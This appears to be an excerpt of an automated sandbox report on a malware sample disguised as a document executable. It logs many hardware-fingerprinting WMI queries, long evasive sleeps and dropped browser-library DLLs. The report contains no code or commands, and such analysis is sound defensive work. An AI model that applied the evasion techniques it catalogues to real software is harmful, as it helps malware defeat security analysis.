Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\cmd.exe TID: 1033720 Thread sleep count: 3341 > 30
Source: C:\Windows\SysWOW64\cmd.exe TID: 1033720 Thread sleep time: -40092000s >= -30000s
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe TID: 1033976 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\chrome.exe TID: 1033756 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\chrome.exe TID: 118108 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 3341
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Window / User API: threadDelayed 9412
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe API coverage: 3.7 %
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IconLib.dll Jump to dropped file
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\msvcp140.dll Jump to dropped file
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
